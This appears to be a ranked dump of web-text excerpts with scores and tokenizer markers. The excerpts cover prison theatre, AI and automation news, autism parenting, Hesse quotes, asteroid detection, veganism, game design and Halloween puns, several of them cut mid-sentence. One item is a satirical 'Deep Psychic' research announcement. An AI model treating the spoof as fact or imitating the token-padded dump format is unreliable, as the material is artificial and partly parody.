Randall, who played Lorenzo, said working with the Marin Shakespeare Company has profoundly affected his outlook on life. + +“It has inspired me to dream again,” Randall said. “It’s given me the courage to trust in other people.” + +Randall, 34, is a San Bernardino County resident serving a life sentence plus nine years for assault with a semi-automatic firearm, first- and second-degree burglary, robbery, vehicle theft and kidnapping. + +Play co-director Lesley Schisgall Currier, with the Marin Shakespeare Company, said the male inmates have developed conflict resolution skills, communication skills and empathy by discussing some of the issues the literature addresses. + +“Some of the themes in this play are very controversial,” Currier said. + +Anti-Semitism is present throughout the play, as are the themes of mercy, love, revenge and forgiveness. The main conflict is the powerful hatred the character Shylock feels for those who have derided him for being Jewish. He seeks revenge on one man in particular, Antonio, but his quest doesn +================================================================================ +Rank = 77; Score = 626688.0 +<|begin_of_text|>Google is training its artificial intelligence machines to understand human behavior by using YouTube videos, the New York Post reported Tuesday. + +The Mountain View company has pulled more than 57,000 publicly available clips to highlight about 80 human actions like walking, kicking, hugging, and shaking hands. Called AVA, or "atomic visual actions," the videos are three second clips curated from YouTube and sourced from a "variety of genres and countries of origin." Some hail from popular films. + +"Despite exciting breakthroughs made over the past years in classifying and finding objects in images, recognizing human actions still remains a big challenge," Alphabet-owned Google wrote in an Oct. 19 blog post. "This is due to the fact that actions are, by nature, less well-defined than objects in videos." + +AI is driving huge changes at Google and CEO Sundar Pichai has put artificial intelligence at the forefront of nearly everything the company is doing. Google's new Pixel smartphones draws on Intel technology, and Rolls Royce recently announced a partnership with the site to create smarter, autonomous ships based on AI and machine learning and is the first agreement ever in the marine sector. + +Google is also working on creating self-driving cars to language recognition software.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 78; Score = 622592.0 +<|begin_of_text|>There’s been a lot of talk in the news recently about the growing threat of automation to jobs traditionally held by humans, but one car manufacturer is bucking the trend by giving bots the boot. + +According to Mercedes-Benz, rising consumer interest in personalisation has resulted in the flexibility and dexterity of human workers reclaiming space on the marque’s assembly lines. + +Speaking to Bloomberg Business, Mercedes’ head of production Markus Schaefer said: “Robots can’t deal with the degree of individualisation and the many variants that we have today. We’re saving money and safeguarding our future by employing more people.” + +While robots are extremely good at reliably, quickly and efficiently performing defined tasks, they’re not good at adapting, something which is increasingly in demand from consumers. + +Given the sheer variety of options available to buyers these days, which can range anywhere from variously coloured leathers to carbon fibre trimmings, versatility is becoming increasingly valued. + +Increased focus on flexibility + +By hiring human workers, Mercedes claims it can shift a production line’s worth of cars in a weekend instead of the weeks it would take to reprogram the robots and change assembly patterns. + +Starting with the refreshed E-Class, Mercedes has altered its production process to replace two permanently installed robots with a human worker to align the car’s heads-up display. + +Although robots are still a vital part of the production process, Shaefer says that they’ll be increasingly smaller and instead operate in conjunction with humans instead of on their own. + +He said: “We’re moving away from trying to maximise automation with people taking a bigger part in industrial processes again. We need to be flexible.” + +Mercedes isn’t alone in the shift to increase human workers either, as both BMW and Volkswagen are reportedly currently testing new lightweight robots that can work alongside people.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 79; Score = 618496.0 +<|begin_of_text|>ADVERTISEMENT + +America's drone program is widely seen as the weapon of choice for the Obama administration. In the president's first term alone, drones were used an estimated four times more than during the entirety of the Bush administration. Clearly, drones will continue to play a key role in the future of combat. + +Currently, there's a human operator behind every machine, ensuring that someone can be held accountable for any misfires or civilian casualties. But what happens when technology advances to the point that humans are removed from the equation? + +That's the question being posed in a new Human Rights Watch report that calls for an international ban on autonomous drones before they can be added to military arsenals worldwide. Realistically, the sophisticated software required to program a self-reliant "killer robot" that chooses its own targets is still 20 to 30 years away, but the advocacy group would rather not take chances. + +"Giving machines the power to decide who lives and dies on the battlefield would take technology too far," said Steve Goose, the Arms Division director at Human Rights Watch. "Human control of robotic warfare is essential to minimizing civilian deaths and injuries." + +But is human involvement really such a good thing? "History has shown that human soldiers are capable of committing the world's worst atrocities despite their supposed humanity," says Tech News Daily. Georgia Tech robotics researcher Ronald Arkin goes so far to argue that a robot wouldn't fall victim to fatigue, and thus would be less susceptible to making boneheaded decisions or getting angry and sadistically abusing its power. + +We should all fear the possibility of autonomous death machines, says Tom Malinowski at The Washington Post. Imagine Syria's Bashar Assad commanding robots "programmed to track and kill protest leaders or to fire automatically on any group of more than five people congregating below." He'd possess a weapon that no other dictator in history had access to: "An army that will never refuse an order, no matter how immoral." Clearly, whether machines should be allowed to serve as both jury and executioner is a decision that will inevitably have to be confronted, preferably sooner rather than later.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 80; Score = 614400.0 +<|begin_of_text|>This post is a continuation from the previous one about the significance of dynamic intelligence in teaching children with autism to learn by themselves. Click here to read the previous post. + +I watched this beautiful mother intently as she told me about her 17 year old son. + +“I was shocked with the autism diagnosis but I never gave up. I tried everything that the speech therapist and occupational therapist asked me to do. And my son improved. It was the happiest day of my life when he got into a normal school.” + +“Everything is good, right?” I asked. Apparently, it wasn’t. + +“Why can’t he have a decent conversation without being prompted?” + +“Why does he always need prompting to give even the right answer appropriately?” + +“How come he learns by rote easily but doesn’t understand concepts?” + +“Why isn’t he confident?” + +“Why does he get bullied at school?” + +I knew how she felt, but continued to probe. + +“What are you looking for? What do you want your son to achieve?” + +“I want him to solve problems independently. I want him to have at least one friend. It breaks my heart to see him being bullied. He doesn’t understand when others are being sarcastic or making fun of him.” + +I saw her eyes shining with unshed tears. She continued with a tremor in her voice, “I’m not getting any younger. How long will I be around to support him?” + +“You’re a wonderful mother,” I said. “You did your best. You did what you were told to do. What you built is known as Static Intelligence. What you should be building though, is Dynamic Intelligence.” + +She looks at me disbelievingly. “What are you talking about? I’ve never heard these terms.” + +I get this question frequently. + +Are you aware of static and dynamic intelligence? + +Your eyes are set on your youngster being independent. You want him to be like the ‘other kids.’ You want him to understand the subtleties of language. + +You know that he has potential. But somehow, neither you nor the therapist are able to tap into it. + +Remember this image? + +Yes, static intelligence is that shiny object that you wanted to achieve. It was easy for your child to pick the right answers in a question. The best part – it’s measurable. + +Here’s the problem: + +Even after building static intelligence your child does not have friends, is not flexible and cannot solve problems independently. Does he keep looking at you for approval even though his answers are right? Does he still heavily rely on prompts? + +Are +================================================================================ +Rank = 81; Score = 614400.0 +<|begin_of_text|>A man cannot live intensely except at the cost of the self. Now the bourgeois treasures nothing more highly than the self (rudimentary as his may be). And so at the cost of intensity he achieves his own preservation and security. His harvest is a quiet mind which he prefers to being possessed by God, as he does comfort to pleasure, convenience to liberty, and a pleasant temperature to that deathly inner consuming fire. The bourgeois is consequently by nature a creature of weak impulses, anxious, fearful of giving himself away and easy to rule. + +It is not our purpose to become each other; it is to recognize each other, to learn to see the other and honor him for what he is: each the other's opposite and complement. + +Hermann Hesse (July 2, 1877 – August 9, 1962) was a German-Swiss poet, novelist, and painter. In 1946, he received the Nobel Prize in Literature. His most famous works include Steppenwolf, Siddhartha, and The Glass Bead Game (also known as Magister Ludi) all of which explore an individual's search for spirituality. + +Quotes [ edit ] + +In the beginning was the myth. God, in his search for self-expression, invested the souls of Hindus, Greeks, and Germans with poetic shapes and continues to invest each child's soul with poetry every day. Variant translation: In the beginning was the myth. Just as the great god composed and struggled for expression in the souls of the Indians, the Greeks and Germanic peoples, so to it continues to compose daily in the soul of every child. + +God, in his search for self-expression, invested the souls of Hindus, Greeks, and Germans with poetic shapes and continues to invest each child's soul with poetry every day. + +Oh, love isn't there to make us happy. I believe it exists to show us how much we can endure. + +That's the way it is when you love. It makes you suffer, and I have suffered much in the years since. But it matters little that you suffer, so long as you feel alive with a sense of the close bond that connects all living things, so long as love does not die! + +Sadness when there should be Joy, hatred when there should be love show compassion because we can be more because we both have scars and pain that no one will ever understand but us so be with me not against me and bring us where we were happy and free. + +I have never lost the feeling of contradiction that lies behind +================================================================================ +Rank = 82; Score = 610304.0 +<|begin_of_text|>At a community college in upstate New York, 12 cafeteria workers recently learned that they will lose their jobs — and be replaced by self-serve machines. It’s an issue that has played out in communities across the country, as robots get better and better at doing jobs — from taking fast food orders to mining coal — that once belonged to humans. + +Is your job next? The answer to that question is complicated, according to a report by management consultant McKinsey, but most workers don’t need to worry. Experts found that less than 5% of jobs can be completely replaced by technology, though nearly every job involves tasks that robots could learn to do. + +Enter your occupation below to see how much of your work may someday be done by machines. + +(For the complete version of the interactive, click here.) + +Jobs with predictable activities in structured environments are the easiest to replicate with robots, a process known as automation. McKinsey estimates that 51% of all job-related activities in the U.S. economy fit this description, largely in manufacturing, food service and retail trade sectors. + +“If you look at the specific jobs affected, you can get depressed,” says Malcolm Frank, author of What To Do When Machines Do Everything. “But if you look in broader context, there’s room for optimism.” Frank points to the 1800s, when nearly 80% of U.S. labor was focused on agriculture. “Today that number is about 2%, yet we saw geometric growth in the U.S. economy. What the machine takes away, it also gives back with entirely new industries, entirely new types of jobs,” he adds. Fields growing today include computing and data science, according to experts.” + +While many of the robots’ gains cut into blue collar jobs, it’s not all bad news for those workers, says University of Cincinnati economics professor Michael Jones. “Electricians, plumbers, and contractors are not going to be replaced,” he says. These workers solve unique challenges in varying environments — tasks difficult for machines. + +And white collar jobs, in turn, are no longer necessarily safe from automation. + +“We’re starting to see computers help corporations make financial decisions, and help IT companies manage cybersecurity,” says Frank. Jones agrees, citing the example of Goldman Sachs, which replaced nearly 600 equity traders with software and 200 computer programmers. + +Click here for more articles from Time Inc.’s Looking Forward series. + +Even if a task can be automated, that doesn’t mean it will happen overnight. Barriers to adopting new technology include the high cost +================================================================================ +Rank = 83; Score = 610304.0 +<|begin_of_text|>He may have what he’s described as only “the Reader’s Digest knowledge of Buddhism,” but famed astrophysicist Neil deGrasse Tyson is a fascinating thinker in just about any capacity. + +So: what does he think about how Buddhist thought and science may or may not intersect? Can they learn from each other? That’s what author Jerome Freedman wanted to know when he sat down with Tyson in 2011. The outspoken Tyson, unsurprisingly, offered skeptical and thoughtful insights into Buddhist philosophy and the nature of the universe, and you’ll find a number of these distilled here in excerpts adapted from the full conversation (which you can read or order a copy of on Freedman’s website, here). Read on for Tyson’s thoughts on the Buddhist ideas of interconnectedness and impermanence, and how a Buddhist outlook might be more conducive to science. + +Interconnectedness + +There is a risk inherent in exploring overlap and resonance between science and spirituality. It’s very easy to ignore that which doesn’t resonate and sift through what does, and come to the misleading conclusion that Buddhism is perfectly aligned with modern cosmology. + +In modern times, we have come to learn about ecology, the interdependence of life, animal life, plant life, water supply, and the atmosphere as a system. Systems engineering is all about interconnectivity and parts that create one functioning whole. + +You could say that Buddha knew this from the beginning. However, before the 20th century, what a human did had very little consequence outside of their system. People were far enough apart that their behavior would not necessarily affect others. Back then, interconnectedness had very little meaningful consequence to anything. + +Today, we fly airplanes from continent to continent; insects and vermin ride ships from one place to another; we change gases in the atmosphere here that circulate around the globe. To say that we are interconnected today with the same fervor as we were interconnected a thousand years ago is just misusing the word. If you don’t distinguish those two cases, it’s hard to have a conversation about what it means to be interconnected. + +In our galaxy, we feel the gravity of another galaxy. We are going to collide with the Andromeda galaxy. That’s scheduled to happen after the sun dies. So, you can say we’re still all connected. But it’s kind of irrelevant because we’ll be vaporized. + +Furthermore, there’s a horizon of the universe that’s expanding. Beyond that horizon, we don’t even feel each others’ gravity. It’s beyond any +================================================================================ +Rank = 84; Score = 606208.0 +<|begin_of_text|>Image copyright Reuters Image caption Better code could help identify where asteroids are heading + +US space agency Nasa is seeking coders who could help prevent a global catastrophe by identifying asteroids that may crash into Earth. + +Its Asteroid Data Hunter contest will offer $35,000 (£21,000) to programmers who can identify asteroids captured by ground-based telescopes. + +The winning solution must increase the detection rate and minimise the number of false positives. + +Scientists are increasingly calling for help to make sense of vast data sets. + +The new improved asteroid hunting code must also be able to ignore imperfections in the data and run on all computer systems. + +"Protecting the planet from the threat of asteroid impact means first knowing where they are," said Jenn Gustetic, executive of the programme. + +"By opening up the search for asteroids, we are harnessing the potential of innovators and makers and citizen scientists everywhere to solve this global challenge." + +Current asteroid detection is only tracking one percent of the estimated objects that orbit the sun, according to asteroid mining firm Planetary Resources, which is partnering with Nasa in the contest. + +Human curiosity + +Zooniverse is one of the leading online platforms for citizen scientists, working on a range of projects including classifying galaxies. + +In February it racked up one million volunteers. + +"Nasa takes these detailed pictures but there is a lot of noise out there from stars and other things and we need to write code that can find patterns in the data," said Zooniverse team member Robert Simpson. + +"This is not necessarily Nasa's area of expertise. It is a technology problem rather than a space problem." + +He thinks that increasingly citizen scientists can contribute to important scientific discoveries and breakthroughs. + +"Computers don't have curiosity. People often find things in the data that computers can't," he told the BBC. + +"We are creating these huge data sets but we don't have enough scientists to analyse them," he added.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 85; Score = 606208.0 +<|begin_of_text|>Jonathan Safran Foer's book Eating Animals changed me from a twenty-year vegetarian to a vegan activist. I've always been shy about being critical of others' choices because I hate when people do that to me. I'm often interrogated about being vegetarian (e.g., "What if you find out that carrots feel pain, too? Then what'll you eat?"). + +I've also been afraid to feel as if I know better than someone else -- a historically dangerous stance (I'm often reminded that "Hitler was a vegetarian, too, you know"). But this book reminded me that some things are just wrong. Perhaps others disagree with me that animals have personalities, but the highly documented torture of animals is unacceptable, and the human cost Foer describes in his book, of which I was previously unaware, is universally compelling. + +The human cost of factory farming -- both the compromised welfare of slaughterhouse workers and, even more, the environmental effects of the mass production of animals -- is staggering. Foer details the copious amounts of pig shit sprayed into the air that result in great spikes in human respiratory ailments, the development of new bacterial strains due to overuse of antibiotics on farmed animals, and the origins of the swine flu epidemic, whose story has gripped the nation, in factory farms. + +I read the chapter on animal shit aloud to two friends -- one is from Iowa and has asthma and the other is a North Carolinian who couldn't eat fish from her local river because animal waste had been dumped in it as described in the book. They had never truly thought about the connection between their environmental conditions and their food. The story of the mass farming of animals had more impact on them when they realized it had ruined their own backyards. + +But what Foer most bravely details is how eating animal pollutes not only our backyards, but also our beliefs. He reminds us that our food is symbolic of what we believe in, and that eating is how we demonstrate to ourselves and to others our beliefs: Catholics take communion -- in which food and drink represent body and blood. Jews use salty water on Passover to remind them of the slaves' bitter tears. And on Thanksgiving, Americans use succotash and slaughter to tell our own creation myth -- how the Pilgrims learned from Native Americans to harvest this land and make it their own. + +And as we use food to impart our beliefs to our children, the point from which Foer lifts off, what stories do we want to tell our children through their food +================================================================================ +Rank = 86; Score = 602112.0 +<|begin_of_text|>In April, the pop musician Lorde gave an interview to the New York Times where she talked about a meeting with famed song writer Max Martin. The genius who helped create Katy Perry’s “I Kissed a Girl” and Taylor Swift’s “Blank Space”, referred to Lorde’s song Green Light as “incorrect songwriting”. He saw its early key change, weird melodics and the lack of drums until the chorus kicks in, as improper. “It wasn’t an insult, just a statement of fact,” said Lorde. “It’s a strange piece of music.” + +Weirdly, as soon as I read the fascinating little snippet of song craft theory, I thought of Sonic the Hedgehog. The legendary platformer, in which a spiky creature sprints furiously through a series of multi-levelled environments is incorrect game design. It shouldn’t work. It’s wrong. + +If you take a classic platform game design, such as Super Mario Bros – the player is always given the chance to read the level: to look ahead and assess every new piece of scenery or patrolling enemy. Then you get a series of neatly placed hazards that present discrete challenges. + +In his excellent book on game design, A Theory of Fun, Raph Koster, says the essence of good game design is teaching – a well constructed level slowly introduces you to its themes, and shows you how to beat them. Learn, test, master. + +Sonic doesn’t do this – all it establishes at the beginning is that speed is important. In a single playthrough, you only ever get a passing feel for the levels; you miss vast areas – all the rules are broken. As in Green Light, the melody and the maths are wrong; new players always find it hard to read the screen, because it’s not working like a good game. + +To reach the more reward-intensive upper levels, you need to master the exact distances and timings between launch pads and obstacles, but it’s impossible to garner this information on a first run-through because the speed of the game – its main appeal – hides everything from you. In Sonic, you must learn through repetition rather than observation. This is confounding for a lot of people – just like the opening verse of Green Light, which holds the drums back for ages, and even then layers them deep beneath the piano. + +Even the influences behind Sonic are incorrect. Designer Naoto Ohshima, who sketched all the zones out by hand, was influenced by pinball table design, filling each stage with flippers and bump +================================================================================ +Rank = 87; Score = 593920.0 +<|begin_of_text|>When Simon Whittick joined Geckoboard as its first VP of Marketing, he took all the standard steps to attract more visitors to their site, convert them, and grow the SaaS company’s revenue. He and his team wrote content for their popular blog, ran paid advertising campaigns, and set up email nurture campaigns. At the end of his first year, he was as successful as almost any other marketing executive in the industry. The site was attracting hundreds of thousands of visitors every month, and the business was booking millions in annual recurring revenue. But unknowingly, his success was driving one of his coworkers crazy. + +While 10,000 leads a month earned Whittick applause at the company’s weekly all-hands meeting, it was keeping Geckoboard’s only sales development rep (SDR), Alex Bates, at the office on nights and weekends. Many of the inbound leads were self-serve customers who required no conversation with sales, or tire kickers who were not ready to buy. This left Alex manually qualifying leads and wasting tons of his time. + +As a result, Geckoboard’s sales efficiency—one of the most critical metrics for any company—was slumping. In other words, Whittick wasn’t only driving a junior sales rep crazy; he was leaving money on the table. + +Over the course of the next year, Whittick built a data-backed machine learning process to solve his company’s lead-qualification problems. In the process, he turned Bates into not only an adoring fan of his, but a one-man sales team as efficient as a typical ten-person SDR team. Without any technical background, Whittick figured out a way to change the shape of his company using data and a bit of machine learning. + +One day toward the end of last year, Bates and Whittick sat down to discuss how they could solve their lead-quality problem. They had close to 10,000 leads coming in each month, but they needed to figure out which of those leads to send to sales. Their first instinct was to refine their ideal customer profile. They’d both read all the sales and marketing blogs preaching its importance. They started with a Ideal Customer Profile based on some simple audience rules. + +On paper, Geckoboard’s ideal customer was a software company with more than 100 employees; they typically sold to a director or VP. But the truth was that a lot of companies outside that explicit profile would be great customers. For example, their initial model excluded a company with 95 +================================================================================ +Rank = 88; Score = 589824.0 +<|begin_of_text|>Description: + +MERL researchers have unveiled "Deep Psychic", a futuristic machine learning method that takes pattern recognition to the next level, by not only recognizing patterns, but also predicting them in the first place. + +The technology uses a novel type of time-reversed deep neural network called Loopy Supra-Temporal Meandering (LSTM) network. The network was trained on multiple databases of historical expert predictions, including weather forecasts, the Farmer's almanac, the New York Post's horoscope column, and the Cambridge Fortune Cookie Corpus, all of which were ranked for their predictive power by a team of quantitative analysts. The system soon achieved super-human performance on a variety of baselines, including the Boca Raton 21 Questions task, Rorschach projective personality test, and a mock Tarot card reading task. + +Deep Psychic has already beat the European Psychic Champion in a secret match last October when it accurately predicted: "The harder the conflict, the more glorious the triumph." It is scheduled to take on the World Champion in a highly anticipated confrontation next month. The system has already predicted the winner, but refuses to reveal it before the end of the game. + +As a first application, the technology has been used to create a clairvoyant conversational agent named "Pythia" that can anticipate the needs of its user. Because Pythia is able to recognize speech before it is uttered, it is amazingly robust with respect to environmental noise. + +Other applications range from mundane tasks like weather and stock market prediction, to uncharted territory such as revealing "unknown unknowns". + +The successes do come at the cost of some concerns. There is first the potential for an impact on the workforce: the system predicted increased pressure on established institutions such as the Las Vegas strip and Punxsutawney Phil. Another major caveat is that Deep Psychic may predict negative future consequences to our current actions, compelling humanity to strive to change its behavior. To address this problem, researchers are now working on forcing Deep Psychic to make more optimistic predictions. + +After a set of motivational self-help books were mistakenly added to its training data, Deep Psychic's AI decided to take over its own learning curriculum, and is currently training itself by predicting its own errors to avoid making them in the first place. This unexpected development brings two main benefits: it significantly relieves the burden on the researchers involved in the system's development, and also makes the next step abundantly clear: to regain control of Deep Psychic's training regime. + +This work is under review in the journal Pseudo- +================================================================================ +Rank = 89; Score = 589824.0 +<|begin_of_text|>Right then – time for some topical humour with halloween right around the corner! I present you 10 are some hand picked funny Halloween puns and jokes! + +Vampires keep their money in the blood bank. + +A ghosts favourite food is a HamBooger! + +Ghosts use elevators to raise their spirits. + +What’s a vampire’s favourite fruit? A necktarine. + +Why did’t the skeleton cross the road? He didn’t have the guts. + +What’s a monsters favourite desert? I-Scream! + +What did the skeleton say to the vampire? You suck. + +Why is a ghost such a messy eater? Because he is always a goblin. + +Why can’t a Skeleton Lift Weights? He’s all bone & no muscle. + +Why does a cemetery have to keep a fence around it? Because people are dying to get in. + +Looking for more fun? Why not check out our main site for some Funny Puns or our Blonde 